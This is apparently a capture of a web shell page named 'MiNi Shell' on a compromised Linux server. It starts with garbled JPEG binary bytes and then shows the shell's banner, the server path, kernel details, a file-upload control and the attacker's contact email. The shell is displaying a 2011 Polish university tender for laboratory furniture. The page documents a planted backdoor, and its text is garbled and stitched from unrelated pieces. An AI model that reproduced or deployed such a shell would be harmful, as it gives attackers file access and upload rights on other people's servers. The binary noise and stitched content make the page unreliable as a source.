JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110406/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110406/108171-N-2011.html

<p class="kh_header"><b>Wrocław: Dostawa i montaż mebli laboratoryjnych. RAP/34/2011</b><br>
<b>Numer ogłoszenia: 108171 - 2011; data zamieszczenia: 06.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Przyrodniczy we Wrocławiu , ul. C.K. Norwida 25/27, 50-375 Wrocław, woj. dolnośląskie, tel. 071 3283576, 3205496, faks 071 3283576.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.up.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż mebli laboratoryjnych. RAP/34/2011.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa i montaż mebli laboratoryjnych dla Katedry Chorób Wewnętrznych z Kliniką Koni, Psów i Kotów
PRACOWNIA  201
Stanowisko laboratoryjne punkt rejestracji, wirowania, rozdziału
 i diagnostyki materiału do badań
  Punkt rejestracji 1700x600, h równe 800 mm
- stelaż metalowy typu C 
- blat wykonany z konglomeratu kwarcowo-granitowego
- nadstawka na monitor
- podstawka pod komputer na kółkach
- półka wysuwana na klawiaturę
- szafka  typ kontener 600  mm, 4 szuflady  w tym co najmniej jedna 
  zamykana na klucz 2 szt.
- szafka dwudrzwiowa pod umywalkę 500 mm - 1 szt.
- szafka trzydrzwiowa z 1 półką 1500x600mm h=800mm z blatem z konglomeratu kwarcowo-granitowego 1500x600mm, w blacie  zlewik 300x150mm - 1 szt.

Punkt wirowania materiału 1000x600, h równe 800 mm
- stelaż typ C, wzmocniony,  
- blat wykonany z konglomeratu kwarcowo-granitowego
- krzesło laboratoryjne poliuretanowe czarne z podłokietnikami, wysokie  wyprofilowane oparcie na kręgosłup i z podnóżkiem, podstawa chromowana na kółkach 4 szt.

Punkt rozdziału materiału 2900x750, h równe 800 mm
- stelaż metalowy  typ C, 
- blat wykonany z konglomeratu kwarcowo-granitowego 
- szafka  typ  kontener 600  mm,  4 szuflady w tym co najmniej jedna zamykana na klucz 2 szt.
- szafka  typ kontener 600 mm, 1 szuflada i 1x drzwi zamykane na klucz, 1x półka  2 szt.
- nadstawka półkowa, 5 półek,1000x300, h równe 1050mm 1 szt.
- nadstawka na monitor
- podstawka pod komputer na kółkach
- półka wysuwana na klawiaturę

Punkt diagnostyki laboratoryjnej 4100x750, h równe 800 mm
- stelaż metalowy typ C 
- blaty wykonany z konglomeratu kwarcowo-granitowego 4100x750 mm z otworami nad kaloryferami
- nadstawka na monitor
- podstawka pod komputer na kółkach
- półka wysuwana na klawiaturę
- szafka  typ kontener 600 mm, 4 szuflady  w tym co najmniej jedna zamykane na klucz  2 szt.
- szafka typ kontener 600 mm, 1 szuflada i drzwi zamykane na klucz, 1x półka  2 szt.
- krzesło laboratoryjne poliuretanowe czarne bez podłokietników,  wyprofilowane  oparcie na kręgosłup i z podnóżkiem, podstawa chromowana na  kółkach 4 szt.
- szafka meblowa na butlę z tlenem  medycznym o pojemności 10 litrów, przymocowana do ściany, otwierana od góry i od frontu, od frontu drzwiczki przeszklone rodzaj i wielkość do uzgodnienia z użytkownikiem - 1 szt.

PRACOWNIA 202
szafki kolorystycznie dobrane do dygestorium zamontowanego w pracowni

Stół laboratoryjny wyspowy z przystawką komputerową oraz z miejscem do ważenia i suszenia.
stół laboratoryjny wyspowy 2400 x 1530, h równe  900 mm 
- stelaż metalowy typ C 
- blat wykonany z konglomeratu kwarcowo-granitowego w blacie dwu- komorowy zlew chemio-odporny z żywicy  epoksydowej, z oczomyjką dwuoczną
- szafki  podblatowe  podwieszane 500 mm, 3 szuflady  w tym co najmniej jedna zamykana  na klucz 2 szt.
- szafki podblatowe podwieszane 500 mm, 1 drzwi zamykane na zamek, 1 szuflada, 1 x półka 4 szt.
 - nadstawka kolumnowa  h równe 500 mm, w kolumnach 6 podwójnych gniazd 230 V, 16A, IP 44, pod półką oświetlenie
- bateria chemio-odporna z wysuwaną słuchawką prysznicową
- przy zlewie  na nadstawce kolumnowej ociekacz  
- zmywarka do mycia naczyń laboratoryjnych klasy A plus zakupiona przez oferenta, pod blatem, pod zabudowę
- taboret laboratoryjny poliuretanowy, czarny, z podnóżkiem, podstawa chromowana  na kółkach 3 szt.

przystawka komputerowa 1530 x 600, h równe 900mm
- stelaż typ C z blatem dopasowany do stołu wyspowego  z wyciętym otworem pod  kalorymetr  
- nadstawka na monitor
- podstawka pod komputer na kółkach
- półka wysuwana na klawiaturę
- szafka dwudrzwiowa pod umywalkę 500mm - 1 szt.
punkt ważenia materiału  1500 x 500, h równe  800 mm 
 - stelaż metalowy typ C
 - blat konglomerat kwarcowo-granitowy
- w blacie otwory, kamień granit 450 x 450  2 szt.
 - dwa niezależne stanowiska na wibroizolatorach
 - szafka rozdzielająca typ kontener 300mm 3 szuflady w tym co najmniej jedna zamykana na klucz

punkt suszenia materiału  3000 x 750, h równe 800 mm
- stelaż metalowy typ C, wzmocniony
- blat wykonany z konglomeratu kwarcowo-granitowego
- szafki  typ kontener 600 mm, 1 szuflada i drzwi zamykane na klucz, 1 x półka 2 szt.

Zabudowa ścienna, szafowa 2300 x 500, h równe 1900 mm
- szafa laboratoryjna trzydrzwiowa przeszklona szybą mleczną 1200 x 500, h równe 1900 mm z półkami, zamykana  na klucz 1 szt.
- szafa ognioodporna, ognioochronna AC 1200 na 50 CM, o wys. 750 mm, automatyczne zamykanie drzwi w przypadku wzrostu temperatury do ca 70 stopni C, odporność ogniowa 90 min. Testy na odporność ogniową przeprowadzone zgodnie z normą EN 14470-1 - dołączyć do dostawy. System wentylacji z 2 certyfikowanymi zaworami bezpieczeństwa, które zapewniają swobodną cyrkulacje powietrza i zamykają się automatycznie przy temperaturze 70 stopni C zgodnie z normą EN -14470-1. Bezpieczne zamknięcie zamkiem cylindrycznym.

PRACOWNIA  203
Stanowisko administracyjne z archiwum i  zabudową meblową
- biurko 1400 x 700, h równe 800 mm - 2 szt.
        nadstawka na monitor- 2 szt.
        podstawka pod komputer na kółkach - 2 szt.
        półka wysuwana na klawiaturę - 2 szt.
        szafka pod biurko  500 mm 1 szuflada zamykana na klucz i drzwi zamykane na klucz, 1x półka - 2 szt.
- fotel biurowy z podłokietnikami, wysokie wyprofilowane oparcie na kręgosłup, z podnóżkiem, kolor do uzgodnienia  1 szt.
- 2 fotele przy stoliku szklanym w kolorze fotela biurowego 
- stolik niski szklany, z półką pod blatem 550 x 550, h równe 450 mm
- szafa dwudrzwiowa 900x500, h równe 1900, z półkami zamykana na klucz, pełna.
- panel ścienny, zabezpieczający ścianę przed uszkodzeniem, w kolorze mebli, wzdłuż ściany 3000 x 250 mm, o grub.15 mm- 2 szt.
- płyta meblowa 1500 x 600 mm, o grub.15 mm, przytwierdzona do ściany z czterema  wieszakami.

Zabudowa meblowa
- blat 2,7 m długości wodoodporny, z wyciętym otworem na zlewozmywak jednokomorowy z ociekaczem i na umywalkę, półzaokrąglony brzeg 
- szafka pod zlewozmywakiem 800mm i umywalką 400mm, na nóżkach
- szafka podblatowa dwudrzwiowa na nóżkach, 1 półka, pełna - 1szt.
- szafka wisząca naścienna, 3 drzwiowa, 2 półki, drzwi pełne - 1 szt. 
- szafka wisząca dwudrzwiowa z suszarką wewnątrz -1 szt.
- stół wyspowy gospodarczy 1600 x 1000 mm, h równe 800mm
- krzesła z oparciem i podłokietnikami, tapicerowane z eko-skóry, kolor do uzgodnienia - 6 szt.
- panel ścienny zabezpieczający ścianę przed uszkodzeniem, w kolorze mebli, wzdłuż  ściany 3300 x 250 mm, o grub.15 mm - 4 szt.

OPIS PRZEDMIOTU ZAMÓWIENIA:
- wszystkie stoły laboratoryjne zaopatrzone w stopy regulacyjne umożliwiające ich  poziomowanie,
- wszystkie blaty: konglomerat kwarcowo granitowy, dopasowane kolorem, fakturą i grubością do istniejących już blatów w pracowni 201,
- w pracowni 203  blat wodoodporny, nie mniej niż 20 mm grubości,
- meble w pracowni 203a kolorystycznie i materiałowo dopasowane do istniejącej już zabudowy meblowej,
- szuflady w prowadnicach z systemem  samo domykania,
- szafki mają być wykonane z płyty obustronnie laminowanej, zaś wszystkie krawędzie widoczne powinny być zabezpieczone obrzeżem doklejanym z PCV o grubości minimum 2 mm,
- krzesła laboratoryjne w kolorze czarnym, z podłokietnikami,   wysokie wyprofilowane oparcie na kręgosłup i z podnóżkiem, z regulacją wysokości siedziska za pomocą podnośnika pneumatycznego, podstawa chromowana na kółkach,
- taborety laboratoryjne obrotowe z poliuretanu, z regulacją siedziska, podłoże chromowane na kółkach,
- wszystkie połączenia instalacji wodnej muszą być  wykonane rurami miedzianym,
- gwarancja 24 miesiące,
- termin dostawy 4 tygodnie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.18.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 28.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymaga się wniesienia wadium w niniejszym postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność polegająca na wykonaniu przedmiotu zamówienia nie wymaga posiadania szczególnych uprawnień. Zamawiający nie dokonuje opisu sposobu spełnienia tego warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie: co najmniej 1 dostawę mebli laboratoryjnych o wartości minimum 50.000,00 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowych warunków w tym zakresie i nie opisu sposobu oceny tego warunku, natomiast Wykonawca winien złożyć stosowne oświadczenie będące załącznikiem do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowych warunków w tym zakresie i nie opisu sposobu oceny tego warunku, natomiast Wykonawca winien złożyć stosowne oświadczenie będące załącznikiem do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowych warunków w tym zakresie i nie opisu sposobu oceny tego warunku, natomiast Wykonawca winien złożyć stosowne oświadczenie będące załącznikiem do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz ofertowy, ewentualne pełnomocnictwo, wypełniony Arkusz kalkulacyjny - załącznik nr 6 do SIWZ, wypełniony formularz Parametry techniczne przedmiotu zamówienia - załącznik nr 7 do SIWZ.

Zgodnie z art 26 ust. 2b ustawy Pzp Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Na podstawie art. 144 ust. 1 ustawy, Zamawiający dopuszcza wprowadzenie istotnych zmian, do zawartej umowy oraz określa warunki tych zmian poprzez dopuszczenie możliwości zmian umowy w formie pisemnego aneksu dotyczącego w szczególności:
a)	przedłużenia terminu realizacji w następujących sytuacjach:
- zawieszenia dostaw przez zamawiającego,
- z przyczyn nieleżących po stronie Wykonawcy oraz w przypadku wystąpienia siły wyższej,
b) inne zmiany:
	 - jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia,
	- możliwa jest zmiana umowy w zakresie podwykonawstwa, za uprzednią zgodą zamawiającego: możliwe jest powierzenie podwykonawcom innego zakresu dostaw niż wskazany w umowie, a także możliwa zmiana podwykonawcy na etapie realizacji dostaw,
   2. Warunki dokonywania zmian:
a) inicjowanie zmian na wniosek wykonawcy lub zamawiającego,
b) uzasadnienie zmiany prawidłową realizacją przedmiotu umowy,
c) forma pisemna pod rygorem nieważności w formie aneksu do umowy.
    3. Wszelkie zmiany niniejszej umowy mogą być dokonywane pod rygorem nieważności jedynie 
w formie pisemnego aneksu, z podpisami upoważnionych przedstawicieli obu stron.
4. Zmiana umowy dokonana z naruszeniem powyższych zasad podlega unieważnieniu.
Ustawowa zmiana stawki podatku VAT: wynagrodzenie należne podlega automatycznej waloryzacji odpowiednio o kwotę podatku VAT wynikającą ze stawki tego podatku obowiązującą w chwili powstania obowiązku podatkowego. W takim przypadku wysokość wynagrodzenia należnego wykonawcy ustalana jest każdorazowo z uwzględnieniem aktualnej stawki podatku VAT obowiązującej  na  dzień  wykonania  przedmiotu  umowy  (powstania  obowiązku   podatkowego).  W takiej sytuacji nie jest wymagane sporządzenie aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.up.wroc.pl (zakładka przetargi)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych i Umów Uniwersytetu Przyrodniczego we Wrocławiu, ul. Mikulicza-Radeckiego 6, pok. 114.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.04.2011 godzina 09:30, miejsce: Uniwersytet Przyrodniczy we Wrocławiu, Sekretariat Kanclerza, ul. Mikulicza-Radeckiego 6, 50-345 Wrocław.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com